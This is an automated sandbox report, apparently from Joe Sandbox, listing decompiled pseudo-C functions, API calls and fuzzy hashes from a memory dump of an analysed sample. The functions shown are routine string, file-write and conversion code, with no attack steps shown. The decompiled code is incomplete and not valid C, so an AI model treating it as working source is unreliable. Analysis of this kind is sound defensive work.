                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                    • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                    • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                    • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 67%
                                                                                    			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
                                                                                    				struct _OVERLAPPED* _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v17;
                                                                                    				long _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				char _v48;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				int _t23;
                                                                                    				intOrPtr _t25;
                                                                                    				void* _t31;
                                                                                    				intOrPtr* _t35;
                                                                                    				signed int _t37;
                                                                                    				short* _t40;
                                                                                    				void* _t43;
                                                                                    				intOrPtr* _t46;
                                                                                    				CHAR* _t49;
                                                                                    				intOrPtr _t50;
                                                                                    				void* _t51;
                                                                                    				short* _t53;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4caa48);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t50;
                                                                                    				_t51 = _t50 - 0x20;
                                                                                    				_push(_t31);
                                                                                    				_t46 = __ecx;
                                                                                    				_v8 = 0;
                                                                                    				_t22 =  >=  ? _a4 :  &_a4;
                                                                                    				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
                                                                                    				_t43 = _t23;
                                                                                    				if(_t43 == 0xffffffff) {
                                                                                    					L8:
                                                                                    					if(_a24 >= 8) {
                                                                                    						_t23 = L00422587(_a4);
                                                                                    					}
                                                                                    					 *[fs:0x0] = _v16;
                                                                                    					return _t23;
                                                                                    				}
                                                                                    				_t53 = _t51 - 0x18;
                                                                                    				_v17 = 0;
                                                                                    				_t40 = _t53;
                                                                                    				 *((intOrPtr*)(_t40 + 0x14)) = 7;
                                                                                    				 *(_t40 + 0x10) = 0;
                                                                                    				 *_t40 = 0;
                                                                                    				if( *_t46 != 0) {
                                                                                    					_t35 = _t46;
                                                                                    					_t31 = _t35 + 2;
                                                                                    					do {
                                                                                    						_t25 =  *_t35;
                                                                                    						_t35 = _t35 + 2;
                                                                                    					} while (_t25 != 0);
                                                                                    					_t37 = _t35 - _t31 >> 1;
                                                                                    					L6:
                                                                                    					_push(_t37);
                                                                                    					E00415C10(_t31, _t40, _t43, _t46, _t46);
                                                                                    					E00412840( &_v48, _v17);
                                                                                    					_t51 = _t53 + 0x18;
                                                                                    					_t49 =  >=  ? _v48 :  &_v48;
                                                                                    					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
                                                                                    					_t23 = CloseHandle(_t43);
                                                                                    					if(_v28 >= 0x10) {
                                                                                    						_t23 = L00422587(_v48);
                                                                                    						_t51 = _t51 + 4;
                                                                                    					}
                                                                                    					goto L8;
                                                                                    				}
                                                                                    				_t37 = 0;
                                                                                    				goto L6;
                                                                                    			}


                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleWritelstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1421093161-0
                                                                                    • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                    • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                    • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                    • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                    				intOrPtr _t25;
                                                                                    				void* _t26;
                                                                                    
                                                                                    				_t25 = _a16;
                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                    					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                    					goto L9;
                                                                                    				} else {
                                                                                    					_t35 = _t25 - 0x66;
                                                                                    					if(_t25 != 0x66) {
                                                                                    						__eflags = _t25 - 0x61;
                                                                                    						if(_t25 == 0x61) {
                                                                                    							L7:
                                                                                    							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                    						} else {
                                                                                    							__eflags = _t25 - 0x41;
                                                                                    							if(__eflags == 0) {
                                                                                    								goto L7;
                                                                                    							} else {
                                                                                    								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                    							}
                                                                                    						}
                                                                                    						L9:
                                                                                    						return _t26;
                                                                                    					} else {
                                                                                    						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                    					}
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                    • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                    • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E004127A0(WCHAR* __ecx, void* __edx) {
                                                                                    				int _v8;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				short* _t12;
                                                                                    				void* _t17;
                                                                                    				char* _t18;
                                                                                    				int _t21;
                                                                                    
                                                                                    				_t16 = __edx;
                                                                                    				_push(__ecx);
                                                                                    				_t12 = __ecx;
                                                                                    				_push(_t17);
                                                                                    				_t5 =  !=  ? 0xfde9 : 0;
                                                                                    				_v8 =  !=  ? 0xfde9 : 0;
                                                                                    				_t2 = lstrlenW(__ecx) + 1; // 0x1
                                                                                    				_t21 = _t2;
                                                                                    				_t18 = E00420C62(_t12, _t16, _t17, _t21);
                                                                                    				E0042B420(_t18, 0, _t21);
                                                                                    				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
                                                                                    				return _t18;
                                                                                    			}


                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32 ref: 004127B9
                                                                                    • _malloc.LIBCMT ref: 004127C3
                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                    • _memset.LIBCMT ref: 004127CE
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2824100046-0
                                                                                    • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                    • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                    • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                    • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _t128;
                                                                                    				intOrPtr _t134;
                                                                                    				intOrPtr* _t137;
                                                                                    				intOrPtr _t140;
                                                                                    				signed int _t144;
                                                                                    				intOrPtr* _t146;
                                                                                    				intOrPtr _t149;
                                                                                    				intOrPtr _t153;
                                                                                    				intOrPtr _t158;
                                                                                    				intOrPtr _t163;
                                                                                    				intOrPtr _t164;
                                                                                    				intOrPtr* _t165;
                                                                                    				intOrPtr _t167;
                                                                                    				intOrPtr _t171;
                                                                                    				intOrPtr _t191;
                                                                                    				signed int _t194;
                                                                                    				intOrPtr* _t195;
                                                                                    				intOrPtr _t196;
                                                                                    				intOrPtr* _t200;
                                                                                    				signed int _t203;
                                                                                    				intOrPtr _t204;
                                                                                    				intOrPtr* _t205;
                                                                                    				intOrPtr _t207;
                                                                                    				intOrPtr* _t208;
                                                                                    				intOrPtr* _t210;
                                                                                    				signed int _t212;
                                                                                    				intOrPtr* _t213;
                                                                                    				intOrPtr* _t217;
                                                                                    				intOrPtr* _t221;
                                                                                    				intOrPtr* _t223;
                                                                                    				intOrPtr* _t224;
                                                                                    				signed int _t226;
                                                                                    				intOrPtr* _t231;
                                                                                    				void* _t232;
                                                                                    				intOrPtr* _t235;
                                                                                    				intOrPtr* _t237;
                                                                                    				intOrPtr* _t240;
                                                                                    				intOrPtr* _t241;
                                                                                    				signed int _t244;
                                                                                    				signed int _t246;
                                                                                    				signed int _t247;
                                                                                    				intOrPtr* _t251;
                                                                                    				void* _t258;
                                                                                    				void* _t259;
                                                                                    
                                                                                    				_t200 = __ecx;
                                                                                    				_t259 = _t258 - 8;
                                                                                    				_t251 = __ecx;
                                                                                    				_t244 = _a4;
                                                                                    				_t128 =  *(__ecx + 0x10);
                                                                                    				if(_t128 < _t244) {
                                                                                    					L86:
                                                                                    					_push("invalid string position");
                                                                                    					E0044F26C(__eflags);
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					return  *((intOrPtr*)(_t200 + 0x10));
                                                                                    				} else {
                                                                                    					_t226 = _a16;
                                                                                    					_t200 =  *((intOrPtr*)(_a12 + 0x10));
                                                                                    					if(_t200 < _t226) {
                                                                                    						goto L86;
                                                                                    					} else {
                                                                                    						_v8 = _t128 - _t244;
                                                                                    						_t191 = _a8;
                                                                                    						_t192 =  <  ? _v8 : _t191;
                                                                                    						_v12 = _t200 - _t226;
                                                                                    						_a8 =  <  ? _v8 : _t191;
                                                                                    						_t200 =  <  ? _v12 : _a20;
                                                                                    						_t194 = _t128 - _a8;
                                                                                    						_v12 = _t194;
                                                                                    						_t195 = _a12;
                                                                                    						_a20 = _t200;
                                                                                    						if((_t128 | 0xffffffff) - _t200 <= _t194) {
                                                                                    							_push("string too long");
                                                                                    							E0044F23E(__eflags);
                                                                                    							goto L86;
                                                                                    						} else {
                                                                                    							_t134 = _a8;
                                                                                    							_t246 = _v12 + _t200;
                                                                                    							_v8 = _v8 - _t134;
                                                                                    							_v12 = _t246;
                                                                                    							_t247 = _a4;
                                                                                    							if( *(__ecx + 0x10) < _t246) {
                                                                                    								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
                                                                                    								_t200 = _a20;
                                                                                    								_t226 = _a16;
                                                                                    								_t134 = _a8;
                                                                                    							}
                                                                                    							if(_t251 == _t195) {
                                                                                    								_t196 = _a20;
                                                                                    								__eflags = _t196 - _t134;
                                                                                    								if(_t196 > _t134) {
                                                                                    									__eflags = _t226 - _t247;
                                                                                    									if(_t226 > _t247) {
                                                                                    										_t203 = _t247 + _t134;
                                                                                    										_a4 = _t203;
                                                                                    										__eflags = _t203 - _t226;
                                                                                    										if(_t203 > _t226) {
                                                                                    											_t204 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    											__eflags = _t204 - 8;
                                                                                    											if(_t204 < 8) {
                                                                                    												_a12 = _t251;
                                                                                    											} else {
                                                                                    												_a12 =  *_t251;
                                                                                    												_t196 = _a20;
                                                                                    											}
                                                                                    											__eflags = _t204 - 8;
                                                                                    											if(_t204 < 8) {
                                                                                    												_t205 = _t251;
                                                                                    											} else {
                                                                                    												_t205 =  *_t251;
                                                                                    											}
                                                                                    											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
                                                                                    											_t207 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    											__eflags = _t207 - 8;
                                                                                    											if(_t207 < 8) {
                                                                                    												_t137 = _t251;
                                                                                    											} else {
                                                                                    												_t137 =  *_t251;
                                                                                    											}
                                                                                    											__eflags = _t207 - 8;
                                                                                    											if(_t207 < 8) {
                                                                                    												_t208 = _t251;
                                                                                    											} else {
                                                                                    												_t208 =  *_t251;
                                                                                    											}
                                                                                    											_a20 = _a4 + _a4;
                                                                                    											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
                                                                                    											_t140 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    											__eflags = _t140 - 8;
                                                                                    											if(_t140 < 8) {
                                                                                    												_t231 = _t251;
                                                                                    											} else {
                                                                                    												_t231 =  *_t251;
                                                                                    											}
                                                                                    											__eflags = _t140 - 8;
                                                                                    											if(_t140 < 8) {
                                                                                    												_t210 = _t251;
                                                                                    											} else {
                                                                                    												_t210 =  *_t251;
                                                                                    											}
                                                                                    											_push(_t196 - _a8);
                                                                                    											_t144 = _a16 + _t196;
                                                                                    											_t211 = _t210 + _a20;
                                                                                    											__eflags = _t210 + _a20;
                                                                                    										} else {
                                                                                    											_t149 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    											__eflags = _t149 - 8;
                                                                                    											if(_t149 < 8) {
                                                                                    												_t235 = _t251;
                                                                                    											} else {
                                                                                    												_t235 =  *_t251;
                                                                                    											}
                                                                                    											__eflags = _t149 - 8;
                                                                                    											if(_t149 < 8) {
                                                                                    												_t213 = _t251;
                                                                                    											} else {
                                                                                    												_t213 =  *_t251;
                                                                                    											}
                                                                                    											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
                                                                                    											_t153 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    											__eflags = _t153 - 8;
                                                                                    											if(_t153 < 8) {
                                                                                    												_t231 = _t251;
                                                                                    											} else {
                                                                                    												_t231 =  *_t251;
                                                                                    											}
                                                                                    											__eflags = _t153 - 8;
                                                                                    											if(_t153 < 8) {
                                                                                    												_push(_t196);
                                                                                    												_t144 = _a16 - _a8 + _t196;
                                                                                    												_t211 = _t251 + _t247 * 2;
                                                                                    											} else {
                                                                                    												_push(_t196);
                                                                                    												_t144 = _a16 - _a8 + _t196;
                                                                                    												_t211 =  *_t251 + _t247 * 2;
                                                                                    											}
                                                                                    										}
                                                                                    									} else {
                                                                                    										_t158 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    										__eflags = _t158 - 8;
                                                                                    										if(_t158 < 8) {
                                                                                    											_t237 = _t251;
                                                                                    										} else {
                                                                                    											_t237 =  *_t251;
                                                                                    										}
                                                                                    										__eflags = _t158 - 8;
                                                                                    										if(_t158 < 8) {
                                                                                    											_t217 = _t251;
                                                                                    										} else {
                                                                                    											_t217 =  *_t251;
                                                                                    										}
                                                                                    										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
                                                                                    										_t163 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    										__eflags = _t163 - 8;
                                                                                    										if(_t163 < 8) {
                                                                                    											_t231 = _t251;
                                                                                    										} else {
                                                                                    											_t231 =  *_t251;
                                                                                    										}
                                                                                    										__eflags = _t163 - 8;
                                                                                    										if(_t163 < 8) {
                                                                                    											_t144 = _a16;
                                                                                    											_push(_t196);
                                                                                    											_t211 = _t251 + _t247 * 2;
                                                                                    										} else {
                                                                                    											_t144 = _a16;
                                                                                    											_push(_t196);
                                                                                    											_t211 =  *_t251 + _t247 * 2;
                                                                                    										}
                                                                                    									}
                                                                                    									_t232 = _t231 + _t144 * 2;
                                                                                    								} else {
                                                                                    									_t164 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    									__eflags = _t164 - 8;
                                                                                    									if(_t164 < 8) {
                                                                                    										_t221 = _t251;
                                                                                    									} else {
                                                                                    										_t221 =  *_t251;
                                                                                    									}
                                                                                    									__eflags = _t164 - 8;
                                                                                    									if(_t164 < 8) {
                                                                                    										_t165 = _t251;
                                                                                    									} else {
                                                                                    										_t165 =  *_t251;
                                                                                    									}
                                                                                    									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
                                                                                    									_t167 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    									__eflags = _t167 - 8;
                                                                                    									if(_t167 < 8) {
                                                                                    										_t240 = _t251;
                                                                                    									} else {
                                                                                    										_t240 =  *_t251;
                                                                                    									}
                                                                                    									__eflags = _t167 - 8;
                                                                                    									if(_t167 < 8) {
                                                                                    										_t223 = _t251;
                                                                                    									} else {
                                                                                    										_t223 =  *_t251;
                                                                                    									}
                                                                                    									_push(_v8);
                                                                                    									_t232 = _t240 + (_a8 + _t247) * 2;
                                                                                    									_t211 = _t223 + (_t247 + _t196) * 2;
                                                                                    								}
                                                                                    								E0040B600(_t211, _t232);
                                                                                    							} else {
                                                                                    								_t171 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    								if(_t171 < 8) {
                                                                                    									_a4 = _t251;
                                                                                    								} else {
                                                                                    									_a4 =  *_t251;
                                                                                    								}
                                                                                    								if(_t171 < 8) {
                                                                                    									_t241 = _t251;
                                                                                    								} else {
                                                                                    									_t241 =  *_t251;
                                                                                    								}
                                                                                    								_t172 = _v8;
                                                                                    								if(_v8 != 0) {
                                                                                    									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
                                                                                    									_t195 = _a12;
                                                                                    									_t259 = _t259 + 0xc;
                                                                                    								}
                                                                                    								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
                                                                                    									_t195 =  *_t195;
                                                                                    								}
                                                                                    								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
                                                                                    									_t224 = _t251;
                                                                                    								} else {
                                                                                    									_t224 =  *_t251;
                                                                                    								}
                                                                                    								_t173 = _a20;
                                                                                    								if(_a20 != 0) {
                                                                                    									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
                                                                                    								}
                                                                                    							}
                                                                                    							_t212 = _v12;
                                                                                    							 *(_t251 + 0x10) = _t212;
                                                                                    							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
                                                                                    								_t146 = _t251;
                                                                                    								__eflags = 0;
                                                                                    								 *((short*)(_t146 + _t212 * 2)) = 0;
                                                                                    								return _t146;
                                                                                    							} else {
                                                                                    								 *((short*)( *_t251 + _t212 * 2)) = 0;
                                                                                    								return _t251;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 4104443479-4289949731
                                                                                    • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                    • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                    • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                    • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
                                                                                    				intOrPtr* _v8;
                                                                                    				signed int _v12;
                                                                                    				intOrPtr _v20;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int _t64;
                                                                                    				signed int _t67;
                                                                                    				signed int _t69;
                                                                                    				signed int _t71;
                                                                                    				signed int _t73;
                                                                                    				signed int _t76;
                                                                                    				intOrPtr _t82;
                                                                                    				intOrPtr _t88;
                                                                                    				intOrPtr* _t96;
                                                                                    				intOrPtr* _t99;
                                                                                    				signed int _t101;
                                                                                    				intOrPtr _t102;
                                                                                    				signed int _t105;
                                                                                    				signed int _t109;
                                                                                    				signed int _t113;
                                                                                    				intOrPtr _t118;
                                                                                    				intOrPtr* _t120;
                                                                                    				void* _t122;
                                                                                    				signed int _t123;
                                                                                    				intOrPtr* _t124;
                                                                                    				intOrPtr* _t125;
                                                                                    				intOrPtr* _t128;
                                                                                    				intOrPtr* _t130;
                                                                                    				intOrPtr _t131;
                                                                                    				void* _t132;
                                                                                    				intOrPtr* _t142;
                                                                                    				signed int _t144;
                                                                                    				void* _t151;
                                                                                    
                                                                                    				_t101 = __ebx;
                                                                                    				_t130 = _a12;
                                                                                    				_t142 = __ecx;
                                                                                    				if(_t130 == 0) {
                                                                                    					L13:
                                                                                    					_t64 =  *(_t142 + 0x10);
                                                                                    					_t109 = _a4;
                                                                                    					__eflags = _t64 - _t109;
                                                                                    					if(__eflags < 0) {
                                                                                    						_push("invalid string position");
                                                                                    						E0044F26C(__eflags);
                                                                                    						goto L44;
                                                                                    					} else {
                                                                                    						_t122 = _t64 - _t109;
                                                                                    						_t109 = _a16;
                                                                                    						_push(_t101);
                                                                                    						_t105 = _a8;
                                                                                    						__eflags = _t122 - _t105;
                                                                                    						_t101 =  <  ? _t122 : _t105;
                                                                                    						_t73 = _t64 - _t101;
                                                                                    						_a8 = _t73;
                                                                                    						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
                                                                                    						if(__eflags <= 0) {
                                                                                    							L44:
                                                                                    							_push("string too long");
                                                                                    							E0044F23E(__eflags);
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							_push(_t101);
                                                                                    							_push(_t142);
                                                                                    							_push(_t130);
                                                                                    							_t131 = _v20;
                                                                                    							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
                                                                                    							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
                                                                                    							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
                                                                                    							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
                                                                                    								_t109 =  *_t109;
                                                                                    							}
                                                                                    							_t102 = _a12;
                                                                                    							__eflags = _t132 - _t102;
                                                                                    							_t144 =  <  ? _t132 : _t102;
                                                                                    							__eflags = _t144;
                                                                                    							if(_t144 == 0) {
                                                                                    								L51:
                                                                                    								_t67 = 0;
                                                                                    								__eflags = 0;
                                                                                    							} else {
                                                                                    								_t120 = _a8;
                                                                                    								while(1) {
                                                                                    									__eflags =  *_t109 -  *_t120;
                                                                                    									if( *_t109 !=  *_t120) {
                                                                                    										break;
                                                                                    									}
                                                                                    									_t109 = _t109 + 2;
                                                                                    									_t120 = _t120 + 2;
                                                                                    									_t144 = _t144 - 1;
                                                                                    									__eflags = _t144;
                                                                                    									if(_t144 != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L51;
                                                                                    									}
                                                                                    									goto L52;
                                                                                    								}
                                                                                    								_t71 =  *_t109 & 0x0000ffff;
                                                                                    								__eflags = _t71 -  *_t120;
                                                                                    								asm("sbb eax, eax");
                                                                                    								_t67 = (_t71 & 0xfffffffe) + 1;
                                                                                    							}
                                                                                    							L52:
                                                                                    							__eflags = _t67;
                                                                                    							if(_t67 != 0) {
                                                                                    								L57:
                                                                                    								return _t67;
                                                                                    							} else {
                                                                                    								__eflags = _t132 - _t102;
                                                                                    								if(_t132 >= _t102) {
                                                                                    									__eflags = _t132 - _t102;
                                                                                    									_t63 = _t132 != _t102;
                                                                                    									__eflags = _t63;
                                                                                    									_t67 = 0 | _t63;
                                                                                    									goto L57;
                                                                                    								} else {
                                                                                    									_t69 = _t67 | 0xffffffff;
                                                                                    									__eflags = _t69;
                                                                                    									return _t69;
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t123 = _t122 - _t101;
                                                                                    							_v12 = _t123;
                                                                                    							__eflags = _t109 - _t101;
                                                                                    							if(_t109 < _t101) {
                                                                                    								_t88 =  *((intOrPtr*)(_t142 + 0x14));
                                                                                    								__eflags = _t88 - 8;
                                                                                    								if(_t88 < 8) {
                                                                                    									_a8 = _t142;
                                                                                    								} else {
                                                                                    									_a8 =  *_t142;
                                                                                    									_t130 = _a12;
                                                                                    								}
                                                                                    								__eflags = _t88 - 8;
                                                                                    								if(_t88 < 8) {
                                                                                    									_v8 = _t142;
                                                                                    								} else {
                                                                                    									_v8 =  *_t142;
                                                                                    								}
                                                                                    								__eflags = _t123;
                                                                                    								if(_t123 != 0) {
                                                                                    									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
                                                                                    									_t130 = _a12;
                                                                                    									_t151 = _t151 + 0xc;
                                                                                    									_t109 = _a16;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags = _t109;
                                                                                    							if(_t109 != 0) {
